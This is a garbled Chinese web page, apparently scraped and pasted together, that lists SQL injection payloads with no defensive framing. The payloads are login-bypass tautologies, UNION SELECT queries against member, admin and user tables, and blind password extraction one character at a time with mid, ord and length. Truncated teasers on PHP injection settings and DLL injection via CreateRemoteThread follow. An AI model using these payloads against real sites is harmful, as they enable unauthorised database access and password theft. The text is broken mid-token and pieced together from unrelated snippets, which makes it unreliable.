' or '1=
1'/* '%
23' and password='
mypass
id=-
1union
select 1,
1,1id
=-1union
select
char(97
),char(97
),char(97
)id=1
union
select 1,
1,1from
members id=
1union
select 1,
1,1from
admin id=
1union
select 1,
1,1from
user
userid=1
andpassword
=mypass
userid=1
andmid
(password,3
,1)=char
(112
)userid=1
andmid
(password,4
,1)=char(97
)and
ord(
mid(
password,3
,1))>
111(ord
函式很好用,可以返回整形的)
' and length(password)='
6(探測密碼長度)
' and left(password,1)='
m ' and left(password,2)='
my …………………………依次類推
' union select 1,username,password from user/*
'union
select 1,
username
,password
from
user
簡述Php指令碼注入技術
php的環境一般是apache php mysql,平常配置伺服器一般是開啟php.ini裡的安全模式,將safe mode設為on,還有就是將display erors設為off,即關閉錯誤顯示。還有乙個非常重要的配置選項 magic quotes gpc,高版本預設為on,以前的版本中預設為of...
注入Hook技術 DLL注入
winnt win2000 winxp中的遠執行緒技術之一 dll注入 什麼是遠執行緒?我們知道用createthread可以在當前程序裡建立乙個執行緒,遠執行緒與此類似,只不過是在其他程序中建立乙個執行緒,用api函式createremotethread。這個遠執行緒建立後就與建立它的程序無關了,...
遠端注入技術
遠端注入技術 loadlibrarya 2.以執行緒形式執行目標程序中的loadlibrarya include include include stdio.h include using namespace std define def buf size 1024 用於儲存注入模組dll的路徑全名...